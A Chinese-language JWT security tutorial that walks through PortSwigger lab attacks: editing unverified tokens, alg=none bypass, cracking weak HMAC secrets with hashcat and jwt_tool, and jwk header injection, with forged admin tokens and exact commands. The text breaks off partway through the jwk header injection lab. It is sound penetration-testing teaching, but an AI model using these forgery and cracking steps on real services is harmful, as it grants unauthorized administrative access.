jwt令牌(jwt是什么)

简单介绍

JWT(JSON Web Token)是一种用于身份认证和授权的开放标准,它通过在网络应用间传递被加密的JSON数据来安全地传输信息使得身份验证和授权变得更加简单和安全,JWT对于渗透测试人员而言可能是一种非常吸引人的攻击途径,因为它们不仅是让你获得无限访问权限的关键而且还被视为隐藏了通往以下特权的途径,例如:特权升级、信息泄露、SQLi、XSS、SSRF、RCE、LFI等

基础概念

  • JWS:Signed JWT,签名过的JWT

  • JWK:JWT的密钥,也就是我们常说的SECRET

  • JWE:Encrypted JWT部分payload经过加密的JWT

  • JKU:JKU(JSON Web Key Set URL)是JWT Header中的一个字段,字段内容是一个URI,该URI用于指定用于验证令牌秘钥的服务器,该服务器用于回复JWK

  • X5U:X5U是JWT Header中的一个字段,指向一组X509公共证书的URL,与JKU功能类似

  • X.509标准:X.509标准是密码学里公钥证书的格式标准,包括TLS/SSL(WWW万维网安全浏览的基石)在内的众多Internet协议都应用了X.509证书)

基本结构

JWT(JSON Web Token)的结构由三部分组成,分别是Header、Payload和Signature,下面是每一部分的详细介绍和示例:

Header

Header包含了JWT使用的算法和类型等元数据信息,通常使用JSON对象表示并使用Base64编码,Header中包含两个字段:alg和typ

  • alg(algorithm):指定了使用的加密算法,常见的有HMAC、RSA和ECDSA等算法

  • typ(type):指定了JWT的类型,通常为JWT

下面是一个示例Header:

{  \\\"alg\\\": \\\"HS256\\\",  \\\"typ\\\": \\\"JWT\\\"}

其中alg指定了使用HMAC-SHA256算法进行签名,typ指定了JWT的类型为JWT

Payload

Payload包含了JWT的主要信息,通常使用JSON对象表示并使用Base64编码,Payload中包含三个类型的字段:注册声明、公共声明和私有声明

  • 公共声明(Public Claims):是自定义的字段,用于传递非敏感信息,例如:用户ID、角色等

  • 私有声明(Private Claims):是自定义的字段,用于传递敏感信息,例如密码、信用卡号等

  • 注册声明(Registered Claims):预定义的标准字段,包含了一些JWT的元数据信息,例如:发行者、过期时间等

下面是一个示例Payload:

{  \\\"sub\\\": \\\"1234567890\\\",  \\\"name\\\": \\\"John Doe\\\",  \\\"iat\\\": 1516239022}

其中sub表示主题,name表示名称,iat表示JWT的签发时间

Signature

Signature是使用指定算法对Header和Payload进行签名生成的,用于验证JWT的完整性和真实性,Signature的生成方式通常是将Header和Payload连接起来然后使用指定算法对其进行签名,最终将签名结果与Header和Payload一起组成JWT,Signature的生成和验证需要使用相同的密钥,下面是一个示例Signature

HMACSHA256(base64UrlEncode(header) + \\\".\\\" +base64UrlEncode(payload),secret)

其中HMACSHA256是使用HMAC SHA256算法进行签名,header和payload是经过Base64编码的Header和Payload,secret是用于签名和验证的密钥,最终将Header、Payload和Signature连接起来用句点(.)分隔就形成了一个完整的JWT,下面是一个示例JWT,其中第一部分是Header,第二部分是Payload,第三部分是Signature,注意JWT 中的每一部分都是经过Base64编码的,但并不是加密的,因此JWT中的信息是可以被解密的

    eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdWIiOiIxMjM0NTY3ODkwIiwibmFtZSI6IkpvaG4gRG9lIiwiaWF0IjoxNTE2MjM5MDIyfQ.SflKxwRJSMeKKF2QT4fwpMeJf36POk6yJV_adQssw5c

    在线平台

    下面是一个JWT在线构造和解构的平台:

    https://jwt.io/

    工作原理

    JWT工作原理

    JWT的工作流程如下:

    • 用户在客户端登录并将登录信息发送给服务器

    • 服务器使用私钥对用户信息进行加密生成JWT并将其发送给客户端

    • 客户端将JWT存储在本地,每次向服务器发送请求时携带JWT进行认证

    • 服务器使用公钥对JWT进行解密和验证,根据JWT中的信息进行身份验证和授权

    • 服务器处理请求并返回响应,客户端根据响应进行相应的操作

    JKU工作原理

    Step 1:用户携带JWS(带有签名的JWT)访问应用

    jwt令牌(jwt是什么)

    Step 2:应用程序解码JWS得到JKU字段

    jwt令牌(jwt是什么)

    Step 3:应用根据JKU访问返回JWK的服务器

    jwt令牌(jwt是什么)

    Step 4:应用程序得到JWK

    jwt令牌(jwt是什么)

    Step 5:使用JWK验证用户JWS

    jwt令牌(jwt是什么)

    Step 6:验证通过则正常响应

    jwt令牌(jwt是什么)

    漏洞攻防

    签名未校验

    验证过程

    JWT(JSON Web Token)的签名验证过程主要包括以下几个步骤:

    • 分离解构:JWT的Header和Payload是通过句点(.)分隔的,因此需要将JWT按照句点分隔符进行分离

    • 验证签名:通过使用指定算法对Header和Payload进行签名生成签名结果,然后将签名结果与JWT中的签名部分进行比较,如果两者相同则说明JWT的签名是有效的,否则说明JWT的签名是无效的

    • 验证信息:如果JWT的签名是有效的则需要对Payload中的信息进行验证,例如:可以验证JWT中的过期时间、发行者等信息是否正确,如果验证失败则说明JWT是无效的

    下面是一个使用JAVA进行JWT签名验证的示例代码:

    import io.jsonwebtoken.Claims;import io.jsonwebtoken.Jwts;import io.jsonwebtoken.SignatureAlgorithm;
    import java.util.Date;
    public class JWTExample {
    private static final String SECRET_KEY = \\\"my_secret_key\\\";
    public static void main(String[] args) { // 构建 JWT String jwtToken = Jwts.builder() .setSubject(\\\"1234567890\\\") .claim(\\\"name\\\", \\\"John Doe\\\") .setIssuedAt(new Date()) .setExpiration(new Date(System.currentTimeMillis() + 3600000)) // 1 hour .signWith(SignatureAlgorithm.HS256, SECRET_KEY) .compact();
    // 验证 JWT try { // 分离 Header, Payload 和 Signature String[] jwtParts = jwtToken.split(\\\"\\\\\\\\.\\\"); String header = jwtParts[0]; String payload = jwtParts[1]; String signature = jwtParts[2];
    // 验证签名 String expectedSignature = Jwts.parser() .setSigningKey(SECRET_KEY) .parseClaimsJws(jwtToken) .getSignature(); if (!signature.equals(expectedSignature)) { throw new RuntimeException(\\\"Invalid JWT signature\\\"); }
    // 验证 Payload 中的信息 Claims claims = Jwts.parser() .setSigningKey(SECRET_KEY) .parseClaimsJws(jwtToken) .getBody(); System.out.println(\\\"Valid JWT\\\"); } catch (Exception e) { System.out.println(\\\"Invalid JWT: \\\" + e.getMessage()); } }}

    在上面的示例代码中使用jwt库进行JWT的签名和验证,首先构建了一个JWT,然后将其分离为Header、Payload和Signature三部分,使用parseClaimsJws函数对JWT进行解析和验证,从而获取其中的Payload中的信息并进行验证,最后如果解析和验证成功,则说明JWT是有效的,否则说明JWT是无效的,在实际应用中应该将SECRET_KEY替换为应用程序的密钥

    漏洞案例

    JWT库会通常提供一种验证令牌的方法和一种解码令牌的方法,比如:Node.js库jsonwebtoken有verify()和decode(),有时开发人员会混淆这两种方法,只将传入的令牌传递给decode()方法,这意味着应用程序根本不验证签名,而我们下面的使用则是一个基于JWT的机制来处理会话,由于实现缺陷服务器不会验证它收到的任何JWT的签名,如果要解答实验问题,您需要修改会话令牌以访问位于/admin的管理面板然后删除用户carlos,您可以使用以下凭据登录自己的帐户:wiener:peter
    靶场地址:https://portswigger.net/web-security/jwt/lab-jwt-authentication-bypass-via-unverified-signature

    jwt令牌(jwt是什么)

    演示步骤:
    Step 1:点击上方的\\”Access the Lab\\”访问靶场并登录账户

    jwt令牌(jwt是什么)

    Step 2:进入到Web界面并登录靶场账户

    wiener:peter

    jwt令牌(jwt是什么)

    jwt令牌(jwt是什么)

    登录之后会看到如下一个更新邮箱的界面

    jwt令牌(jwt是什么)

    Step 3:此时在我们的burpsuite中我们可以看到如下的会话信息

    jwt令牌(jwt是什么)

    此时查询当前用户可以看到会显示当前用户为wiener:

    jwt令牌(jwt是什么)

    截取上面中间一部分base64编码的部分更改上面的sub为\\”administrator\\”

    eyJpc3MiOiJwb3J0c3dpZ2dlciIsInN1YiI6IndpZW5lciIsImV4cCI6MTY4Nzc5MDA4M30

    jwt令牌(jwt是什么)

    构造一个sub为\\”administrator\\”的载荷并将其进行base64编码处理:

    eyJpc3MiOiJwb3J0c3dpZ2dlciIsInN1YiI6ImFkbWluaXN0cmF0b3IiLCJleHAiOjE2ODc3OTAwODN9

    jwt令牌(jwt是什么)

    替换之后重新发送请求:

    jwt令牌(jwt是什么)

    按照题目要求访问/admin路径,发现两个删除用户的调用接口:

    jwt令牌(jwt是什么)

    请求敏感链接——删除用户carlos

    GET /admin/delete?username=carlos HTTP/1.1

    jwt令牌(jwt是什么)

    完成靶场的解答:

    jwt令牌(jwt是什么)

    签名用None

    场景介绍

    在JWT的Header中alg的值用于告诉服务器使用哪种算法对令牌进行签名,从而告诉服务器在验证签名时需要使用哪种算法,目前可以选择HS256,即HMAC和SHA256,JWT同时也支持将算法设定为\\”None\\”,如果\\”alg\\”字段设为\\”None\\”,则标识不签名,这样一来任何token都是有效的,设定该功能的最初目的是为了方便调试,但是若不在生产环境中关闭该功能,攻击者可以通过将alg字段设置为\\”None\\”来伪造他们想要的任何token,接着便可以使用伪造的token冒充任意用户登陆网站

    {    \\\"alg\\\": \\\"none\\\",    \\\"typ\\\": \\\"JWT\\\"}
    漏洞案例

    实验靶场:https://portswigger.net/web-security/jwt/lab-jwt-authentication-bypass-via-flawed-signature-verification

    jwt令牌(jwt是什么)

    实验流程:
    Step 1:点击上方的\\”Access the lab\\”访问靶场环境
    https://0a9c00a8030ba77784d7b92d00cc0086.web-security-academy.net/

    jwt令牌(jwt是什么)

    Step 2:使用账户密码进行登录

    wiener:peter

    jwt令牌(jwt是什么)

    Step 3:登录之后可以看到如下界面

    jwt令牌(jwt是什么)

    Step 4:捕获到的数据报信息如下所示

    jwt令牌(jwt是什么)

    截取JWT的第二部分对其进行base64解码:

    eyJpc3MiOiJwb3J0c3dpZ2dlciIsInN1YiI6IndpZW5lciIsImV4cCI6MTY4Nzc5MzQ5M30

    jwt令牌(jwt是什么)

    将上述的sub字段值更改为\\”administrator\\”

    eyJpc3MiOiJwb3J0c3dpZ2dlciIsInN1YiI6ImFkbWluaXN0cmF0b3IiLCJleHAiOjE2ODc3OTM0OTN9

    jwt令牌(jwt是什么)

    Step 4:在使用wiener用户的凭据访问/admin是会提示401 Unauthorized

    jwt令牌(jwt是什么)

    Step 5:将第一步分的alg参数改为none

    eyJraWQiOiIyNmNlNGNmMi0wYjFhLTQzZTUtOWYzNy1kOTA2ZjkxZmY2MzkiLCJhbGciOiJSUzI1NiJ9

    jwt令牌(jwt是什么)

    更改之后的header部分:

    eyJraWQiOiIyNmNlNGNmMi0wYjFhLTQzZTUtOWYzNy1kOTA2ZjkxZmY2MzkiLCJhbGciOiJub25lIn0=

    jwt令牌(jwt是什么)

    替换JWT Token中的第二部分为之前我们构造的信息,同时移除签名部分,再次请求数据获取到敏感数据链接

    jwt令牌(jwt是什么)

    调用敏感链接移除用户信息,完成解题操作:

    jwt令牌(jwt是什么)

    jwt令牌(jwt是什么)

    密钥暴力猜解

    密钥介绍

    在JT中密钥用于生成和验证签名,因此密钥的安全性对JWT的安全性至关重要,一般来说JWT有以下两种类型的密钥:

    • 对称密钥:对称密钥是一种使用相同的密钥进行加密和解密的加密算法,在JWT中使用对称密钥来生成和验证签名,因此密钥必须保密,只有发送方和接收方知道,由于对称密钥的安全性取决于密钥的保密性,因此需要采取一些措施来保护它

    • 非对称密钥:非对称密钥使用公钥和私钥来加密和解密数据,在JWT中使用私钥生成签名,而使用公钥验证签名,由于公钥可以公开,因此非对称密钥通常用于验证方的身份

    下面是一个使用JWT和对称密钥的JAVA示例代码:

    import io.jsonwebtoken.Jwts;import io.jsonwebtoken.SignatureAlgorithm;import java.util.Date;
    public class JWTExample { private static final String SECRET_KEY = \\\"mysecretkey\\\"; // 设置密钥
    public static void main(String[] args) { String token = createJWT(\\\"123456\\\"); // 生成JWT System.out.println(token); String result = parseJWT(token); // 验证JWT System.out.println(result); }
    public static String createJWT(String id) { // 设置JWT过期时间为1小时 long nowMillis = System.currentTimeMillis(); Date now = new Date(nowMillis); long expMillis = nowMillis + 3600000; // 1小时 Date exp = new Date(expMillis);
    // 生成JWT String token = Jwts.builder() .setId(id) .setIssuer(\\\"issuer\\\") .setSubject(\\\"subject\\\") .setIssuedAt(now) .setExpiration(exp) .signWith(SignatureAlgorithm.HS256, SECRET_KEY) .compact(); return token; }
    public static String parseJWT(String token) { // 验证JWT是否合法 String result = \\\"\\\"; try { result = Jwts.parser() .setSigningKey(SECRET_KEY) .parseClaimsJws(token) .getBody() .getId(); } catch (Exception e) { e.printStackTrace(); } return result; }}

    下面是一个使用JWT和非对称密钥的Java示例代码,代码中使用了RSA算法生成非对称密钥对:

    import io.jsonwebtoken.Claims;import io.jsonwebtoken.Jwts;import io.jsonwebtoken.SignatureAlgorithm;import io.jsonwebtoken.security.Keys;import java.security.KeyPair;import java.security.KeyPairGenerator;import java.security.NoSuchAlgorithmException;import java.security.PrivateKey;import java.security.PublicKey;import java.util.Date;
    public class JWTExample { private static final String ISSUER = \\\"example.com\\\"; private static final String SUBJECT = \\\"user@example.com\\\";
    public static void main(String[] args) throws Exception { KeyPair keyPair = generateKeyPair();
    String token = createJWT(ISSUER, SUBJECT, keyPair.getPrivate()); System.out.println(token);
    Claims claims = parseJWT(token, keyPair.getPublic()); System.out.println(claims.getIssuer()); System.out.println(claims.getSubject()); }
    public static String createJWT(String issuer, String subject, PrivateKey privateKey) { Date now = new Date(); Date expiration = new Date(now.getTime() + 3600 * 1000); // 1 hour
    return Jwts.builder() .setIssuer(issuer) .setSubject(subject) .setIssuedAt(now) .setExpiration(expiration) .signWith(privateKey, SignatureAlgorithm.RS256) .compact(); }
    public static Claims parseJWT(String token, PublicKey publicKey) { return Jwts.parserBuilder() .setSigningKey(publicKey) .build() .parseClaimsJws(token) .getBody(); }
    public static KeyPair generateKeyPair() throws NoSuchAlgorithmException { KeyPairGenerator generator = KeyPairGenerator.getInstance(\\\"RSA\\\"); generator.initialize(2048); return generator.generateKeyPair(); }}

    在这个示例中我们使用了Java中的KeyPairGenerator类来生成一个2048位的RSA密钥对,然后使用私钥生成JWT,使用公钥验证JWT,在创建JWT时我们设置了JWT的颁发者、主题、签发时间和过期时间并使用signWith()方法和SignatureAlgorithm.RS256算法使用私钥进行签名,在验证JWT时我们使用公钥来解析JWT并获取声明的内容,在实际的研发编码中我们一方面要妥善保管密钥,另一方面需要使用较为复杂难以被猜解的密钥作为密钥首选,例如:随机字母+数字的32位长度组合

    漏洞案例

    在实现JWT应用程序时,开发人员有时会犯一些错误,比如:忘记更改默认密码或占位符密码,他们甚至可能复制并粘贴他们在网上找到的代码片段然后忘记更改作为示例提供的硬编码秘密,在这种情况下攻击者使用众所周知的秘密的单词列表来暴力破解服务器的秘密是很容易的,下面是一个公开已知密钥列表:
    https://github.com/wallarm/jwt-secrets/blob/master/jwt.secrets.list

    jwt令牌(jwt是什么)

    在这里我们也建议使用hashcat来强力破解密钥,您可以手动安装hashcat,也可以在Kali Linux上使用预先安装好的hashcat,您只需要一个来自目标服务器的有效的、签名的JWT和一个众所周知的秘密的单词表然后就可以运行以下命令,将JWT和单词列表作为参数传入:

    hashcat -a 0 -m 16500 <jwt> <wordlist>

    Hashcat会使用单词列表中的每个密钥对来自JWT的报头和有效载荷进行签名,然后将结果签名与来自服务器的原始签名进行比较,如果有任何签名匹配,hashcat将按照以下格式输出识别出的秘密以及其他各种详细信息,由于hashcat在本地机器上运行不依赖于向服务器发送请求,所以这个过程非常快,即使使用一个巨大的单词表一旦您确定了密钥,您就可以使用它为任何JWT报头和有效载荷生成有效的签名

    <jwt>:<identified–secret>

    靶场地址:https://portswigger.net/web-security/jwt/lab-jwt-authentication-bypass-via-weak-signing-key

    jwt令牌(jwt是什么)

    实验步骤:
    Step 1:点击上述\\”Access the lab\\”进入到靶场环境

    jwt令牌(jwt是什么)

    Step 2:使用以下账户进行登录操作

    wiener:peter

    jwt令牌(jwt是什么)

    Step 3:捕获到如下有效的JWT凭据信息

    eyJraWQiOiI4M2RhOGNjMi1hZmZiLTRmZGMtYWMwYS1iMWNmMTBkNjkyZGYiLCJhbGciOiJIUzI1NiJ9.eyJpc3MiOiJwb3J0c3dpZ2dlciIsInN1YiI6IndpZW5lciIsImV4cCI6MTY4Nzc5NjQwMn0.IhZV-7RHTpEcQvkcZOA3knCYmQD0YUg-NFMj9fWSFjw

    jwt令牌(jwt是什么)

    jwt令牌(jwt是什么)

    Step 5:使用字典进行暴力猜解操作

    方式一:HashCat
    项目地址:https://github.com/hashcat/hashcat
    项目使用:

    #命令格式:hashcat -a 0 -m 16500 <jwt> <wordlist>
    #执行示例:hashcat -m 16500 jwt.txt -a 0 secrets.txt --force

    jwt令牌(jwt是什么)

    方式二:jwt_tool
    项目地址:https://github.com/ticarpi/jwt_tool
    项目介绍:此项目主要用于JWT安全脆弱性评估,目前支持如下几种安全评估测试

    • (CVE-2015-2951) The alg=none signature-bypass vulnerability

    • (CVE-2016-10555) The RS/HS256 public key mismatch vulnerability

    • (CVE-2018-0114) Key injection vulnerability

    • (CVE-2019-20933/CVE-2020-28637) Blank password vulnerability

    • (CVE-2020-28042) Null signature vulnerabilit

    jwt令牌(jwt是什么)

    Step 1:克隆项目到本地

    https://github.com/ticarpi/jwt_tool

    jwt令牌(jwt是什么)

    Step 2:安装依赖库

    pip3 install pycryptodomex

    Step 3:运行jwt_tool并查看用法信息

    python3 jwt_tool.py -h

    jwt令牌(jwt是什么)

    usage: jwt_tool.py [-h] [-b] [-t TARGETURL] [-rc COOKIES] [-rh HEADERS] [-pd POSTDATA] [-cv CANARYVALUE] [-np] [-nr] [-M MODE] [-X EXPLOIT] [-ju JWKSURL] [-S SIGN] [-pr PRIVKEY] [-T] [-I] [-hc HEADERCLAIM] [-pc PAYLOADCLAIM] [-hv HEADERVALUE]                   [-pv PAYLOADVALUE] [-C] [-d DICT] [-p PASSWORD] [-kf KEYFILE] [-V] [-pk PUBKEY] [-jw JWKSFILE] [-Q QUERY] [-v]                   [jwt]
    positional arguments: jwt the JWT to tinker with (no need to specify if in header/cookies)
    options: -h, --help show this help message and exit -b, --bare return TOKENS ONLY -t TARGETURL, --targeturl TARGETURL URL to send HTTP request to with new JWT -rc COOKIES, --cookies COOKIES request cookies to send with the forged HTTP request -rh HEADERS, --headers HEADERS request headers to send with the forged HTTP request (can be used multiple times for additional headers) -pd POSTDATA, --postdata POSTDATA text string that contains all the data to be sent in a POST request -cv CANARYVALUE, --canaryvalue CANARYVALUE text string that appears in response for valid token (e.g. \\\"Welcome, ticarpi\\\") -np, --noproxy disable proxy for current request (change in jwtconf.ini if permanent) -nr, --noredir disable redirects for current request (change in jwtconf.ini if permanent) -M MODE, --mode MODE Scanning mode: pb = playbook audit er = fuzz existing claims to force errors cc = fuzz common claims at - All Tests! -X EXPLOIT, --exploit EXPLOIT eXploit known vulnerabilities: a = alg:none n = null signature b = blank password accepted in signature s = spoof JWKS (specify JWKS URL with -ju, or set in jwtconf.ini to automate this attack) k = key confusion (specify public key with -pk) i = inject inline JWKS -ju JWKSURL, --jwksurl JWKSURL URL location where you can host a spoofed JWKS -S SIGN, --sign SIGN sign the resulting token: hs256/hs384/hs512 = HMAC-SHA signing (specify a secret with -k/-p) rs256/rs384/hs512 = RSA signing (specify an RSA private key with -pr) es256/es384/es512 = Elliptic Curve signing (specify an EC private key with -pr) ps256/ps384/ps512 = PSS-RSA signing (specify an RSA private key with -pr) -pr PRIVKEY, --privkey PRIVKEY Private Key for Asymmetric crypto -T, --tamper tamper with the JWT contents (set signing options with -S or use exploits with -X) -I, --injectclaims inject new claims and update existing claims with new values (set signing options with -S or use exploits with -X) (set target claim with -hc/-pc and injection values/lists with -hv/-pv -hc HEADERCLAIM, --headerclaim HEADERCLAIM Header claim to tamper with -pc PAYLOADCLAIM, --payloadclaim PAYLOADCLAIM Payload claim to tamper with -hv HEADERVALUE, --headervalue HEADERVALUE Value (or file containing values) to inject into tampered header claim -pv PAYLOADVALUE, --payloadvalue PAYLOADVALUE Value (or file containing values) to inject into tampered payload claim -C, --crack crack key for an HMAC-SHA token (specify -d/-p/-kf) -d DICT, --dict DICT dictionary file for cracking -p PASSWORD, --password PASSWORD password for cracking -kf KEYFILE, --keyfile KEYFILE keyfile for cracking (when signed with \\\'kid\\\' attacks) -V, --verify verify the RSA signature against a Public Key (specify -pk/-jw) -pk PUBKEY, --pubkey PUBKEY Public Key for Asymmetric crypto -jw JWKSFILE, --jwksfile JWKSFILE JSON Web Key Store for Asymmetric crypto -Q QUERY, --query QUERY Query a token ID against the logfile to see the details of that request e.g. -Q jwttool_46820e62fe25c10a3f5498e426a9f03a -v, --verbose When parsing and printing, produce (slightly more) verbose output.
    If you don\\\'t have a token, try this one:eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJsb2dpbiI6InRpY2FycGkifQ.bsSwqj2c2uI9n7-ajmi3ixVGhPUiY7jO9SUn9dm15Po

    Step 4:暴力猜解密钥

    #命令格式python3 jwt_tool.py JWT_HERE -C -d dictionary.txt
    #执行示例python3 jwt_tool.py eyJraWQiOiI4M2RhOGNjMi1hZmZiLTRmZGMtYWMwYS1iMWNmMTBkNjkyZGYiLCJhbGciOiJIUzI1NiJ9.eyJpc3MiOiJwb3J0c3dpZ2dlciIsInN1YiI6IndpZW5lciIsImV4cCI6MTY4Nzc5NjQwMn0.IhZV-7RHTpEcQvkcZOA3knCYmQD0YUg-NFMj9fWSFjw -C -d secrets.txt

    jwt令牌(jwt是什么)

    附加扩展:

    #尝试破解密钥(HMAC算法)python3 jwt_tool.py JWT_HERE -C -d dictionary.txt
    #尝试使用已知的公钥对不对称密码(RS-,EC-,PS-)进行\\\"密钥混淆\\\"攻击python3 jwt_tool.py JWT_HERE -K -pk my_public.pem
    #尝试使用\\\"无\\\"算法来创建未验证的令牌python3 jwt_tool.py JWT_HERE -A
    #处理JSON Web密钥存储文件,重建公共密钥,然后测试密钥以查看验证令牌的密钥python3 jwt_tool.py JWT_HERE -J -jw jwks.json
    #生成一个新的RSA密钥对,将公钥作为JSON Web密钥存储对象注入令牌并使用私钥对令牌签名python3 jwt_tool.py JWT_HERE -I
    #欺骗远程JWKS:生成新的RSA密钥对,将提供的URL注入令牌,将公共密钥导出为JSON Web密钥存储对象(以提供的URL进行服务)并使用私钥对令牌签名python3 jwt_tool.py JWT_HERE -S -u http://example.com/jwks.json

    Step 5:随后在网页端重新设置密钥(secret1)并重新产生的字符串 Header:

    eyJraWQiOiJjY2Y4Yjk3YS05NGZlLTRjN2QtOWI2MS0yNzZmMDY1NGMyZWIiLCJhbGciOiJIUzI1NiJ9{\\\"kid\\\":\\\"ccf8b97a-94fe-4c7d-9b61-276f0654c2eb\\\",\\\"alg\\\":\\\"HS256\\\"}

    jwt令牌(jwt是什么)

    payload(前):

    eyJpc3MiOiJwb3J0c3dpZ2dlciIsInN1YiI6IndpZW5lciIsImV4cCI6MTY4Nzc5OTk1OX0{\\\"iss\\\":\\\"portswigger\\\",\\\"sub\\\":\\\"wiener\\\",\\\"exp\\\":1687799959}

    jwt令牌(jwt是什么)

    payload(新):

    {\\\"iss\\\":\\\"portswigger\\\",\\\"sub\\\":\\\"administrator\\\",\\\"exp\\\":1687799959}eyJpc3MiOiJwb3J0c3dpZ2dlciIsInN1YiI6ImFkbWluaXN0cmF0b3IiLCJleHAiOjE2ODc3OTk5NTl9

    jwt令牌(jwt是什么)

    Signer:

    E891AutpjiwkhVUDV2dZdrfGzsv5TweyIUUhT_a1Ar0

    jwt令牌(jwt是什么)

    最终高权限的JWT token如下:

    eyJraWQiOiJjY2Y4Yjk3YS05NGZlLTRjN2QtOWI2MS0yNzZmMDY1NGMyZWIiLCJhbGciOiJIUzI1NiJ9.eyJpc3MiOiJwb3J0c3dpZ2dlciIsInN1YiI6ImFkbWluaXN0cmF0b3IiLCJleHAiOjE2ODc3OTk5NTl9.E891AutpjiwkhVUDV2dZdrfGzsv5TweyIUUhT_a1Ar0

    jwt令牌(jwt是什么)

    Step 6:访问/admin路径

    jwt令牌(jwt是什么)

    Step 7:调用接口删除用户完成解答

    jwt令牌(jwt是什么)

    jwt令牌(jwt是什么)

    JWT头部注入
    场景介绍

    如果服务器端使用一个非常脆弱的密钥,我们甚至有可能一个字符一个字符地来暴力破解这个密钥,根据JWS规范只有alg报头参数是强制的,然而在实践中JWT报头通常包含几个其他参数,以下是攻击者特别感兴趣的:

    • jwk(JSON Web Key):提供一个代表密钥的嵌入式JSON对象

    • jku(JSON Web Key Set URL):提供一个URL,服务器可以从这个URL获取一组包含正确密钥的密钥

    • kid(密钥id):提供一个ID,在有多个密钥可供选择的情况下服务器可以用它来识别正确的密钥,根据键的格式这可能有一个匹配的kid参数

    这些用户可控制的参数每个都告诉接收方服务器在验证签名时应该使用哪个密钥,下面我们将介绍如何利用这些参数来注入使用您自己的任意密钥而不是服务器的密钥签名修改过的JWT

    注入场景1

    下面我们介绍如何通过JWK参数注入自签名的JWT,JWS(JSON Web Signature)规范描述了一个可选的jwk header参数,服务器可以使用该参数以jwk格式将其公钥直接嵌入令牌本身,您可以在下面的JWT head中看到具体的示例:

    {    \\\"kid\\\": \\\"ed2Nf8sb-sD6ng0-scs5390g-fFD8sfxG\\\",    \\\"typ\\\": \\\"JWT\\\",    \\\"alg\\\": \\\"RS256\\\",    \\\"jwk\\\": {        \\\"kty\\\": \\\"RSA\\\",        \\\"e\\\": \\\"AQAB\\\",        \\\"kid\\\": \\\"ed2Nf8sb-sD6ng0-scs5390g-fFD8sfxG\\\",        \\\"n\\\": \\\"yy1wpYmffgXBxhAUJzHHocCuJolwDqql75ZWuCQ_cb33K2vh9m\\\"    }}

    理想情况下服务器应该只使用有限的公钥白名单来验证JWT签名,然而错误配置的服务器有时会使用jwk参数中嵌入的键值,您可以通过使用自己的RSA私钥对修改后的JWT进行签名,然后在jwk头中嵌入匹配的公钥来利用这种行为,Burpsuite的JWT Editor扩展提供了一个有用的功能来帮助您测试此漏洞,您可以在Burp中手动添加或修改JWT参数
    靶场地址:https://portswigger.net/web-security/jwt/lab-jwt-authentication-bypass-via-jwk-header-injection

    jwt令牌(jwt是什么)

    Step 1:点击\\”ACCESS THE LAB\\”访问靶场

    jwt令牌(jwt是什么)

    Step 3:点击\\”My Account\\”登录系统

    wiener:peter

    jwt令牌(jwt是什么)

    Step 4:登录之后可以看到如下邮箱更新界面

    jwt令牌(jwt是什么)

    Step 5:下面我们开始操作,不过在此之前我们得先武器化以下自己,在Burpsuite界面选择\\”Extender\\”选项卡,紧接着点击\\”BApp Store\\”安装\\”JWT Editor\\”

    jwt令牌(jwt是什么)

    之后你可以看到如下的选项卡界面

    jwt令牌(jwt是什么)

    Step 6:生成一个新的RSA密钥

    {    \\\"p\\\": \\\"8J0fgpxQpZOvPGb2rRsJB6Bh0lgvxRtp_Ilc7NmpI3UgEUiArSey091pT3X6lIPRZLdMf_eeYo_PWh5aq79Ps_xoZHtAz4VrR9sR8tCkND-z0KKBmopkUrowJie368xoWDU53P-4qxEfCfqPPxoZZRzhE7cse0PUVayNAJC01FU\\\",    \\\"kty\\\": \\\"RSA\\\",    \\\"q\\\": \\\"1zMkdJNLYEdZYvZ31B15CmCfI9dOGEpn6lyXOEBPsqrP554x_8dXZnXSHbybiYyeLgl6i_JubJBqjeSAejwHh9v-e3-R9-7Dgg4lB_OUNqsg7yM3mcpZn7IHeGVKj9BjhigWsbUXFuwM1iEDK4TDmTV4-tO9UMsIBQA1SFlUTA8\\\",    \\\"d\\\": \\\"Ayw2AASn_yn6EwjqCts6_gP6NZ9BlNhCG1iuDTX9h_AGWYBtUepdgp4CaM098ZyjH2Da3RvonFVlTOwHTgVAdkb2eWqeMejMjUji3cKIQRU_r0UeY3C4q8BBuWjwzF7ZTeVDgbx05NfeUW0LwWE3mFBuPDy6tmvYdekcs8Ft7GDmU_ToPZaGnMoEKzVlMyDb82LgkB7qWw2H4UoXHWR0l_RS90gTjkJzMc4Fmu4CoPfmqw8jLnGgq8GhAzpecc-VLvqel3tSY0fKqF5Y3U2SooL27vJJxX0kLgHVbcTNvCcS8XZArdhWTekV923jtspoNDYn5HfhAlLglCcwQcOSYQ\\\",    \\\"e\\\": \\\"AQAB\\\",    \\\"kid\\\": \\\"fa018615-0392-4d15-89bb-a2c637d9adbd\\\",    \\\"qi\\\": \\\"XO3HEFj8PCxFz4DIw0djHjTrW4Krm-Oim-U4bmuEdmPDKKTIYYvkPVoSRR-4kCHkCx2aDsraUbNkTyEYC4dRUbnWl6xr2HxaLZIsxOglYsa939l_m6NXSzttAGrPpWqoURT7t6ihSmBnGDJDsMS3c1gWJKZsAYkeXy5lI2IhGks\\\",    \\\"dp\\\": \\\"0gfldIZsY0w5_9jE5LAfvreCDDGMaVsXtihVpC4PVXMs7clDAWMQ152DCqiqdi9mfar_LQkCCXkM_9ZVQWw675qZqXRpS3xj_BI_ZZw4aZ9dn_XqefLpxcjetL-g7US9pJm5i67xDOpiFLzRg7yNhFSkKCiRvHumAq8fWen23w0\\\",    \\\"dq\\\": \\\"QcZI6zSmAjxsjrnkcDm96DUWDv9cyEHdtx0rvy6w7VwWBaYthA8qoI98dEhUhdsr8chF44Zqx9XwK4Re3H2Ck7zi8F5SgCRDL3ohSWfisj7l5xGtidz2PcBNVjgnbQN1l-ii3xgJgaEOX1hhvqhqnGZins-e-pXD0rt4ja93-3M\\\",    \\\"n\\\": \\\"ykQHB6Jelehm2eVfkb-2mSTpfODsGlthhS0sTLX5geGwsQCz4gnRbXPN5gOsCpqUbJH9gDE80q262XuS8DNrdmTLTPjuM4wRc-ghh9GvOCgJGBtO1PIVCTIsPmwhMra0eykwj246GReyoDcUhreG2yZ8rg-tHIcxPyWBtdKY2tubM6-YLk5gVLcuHRL25Fn_I5NghQbyzmISbulJ1CMq5WU-h9RA8IkYhVcrsP8Y1E2dc4fagKn5Tp60bUkjCcqIMAKouI-CX86mF0k3cSd340KuUXuf2vIo_yWMhZjFkAxj-gBn4eO3l2qZgyGkkHMn0HL8RSDzdG-BSBgNYoWs-w\\\"}

    jwt令牌(jwt是什么)

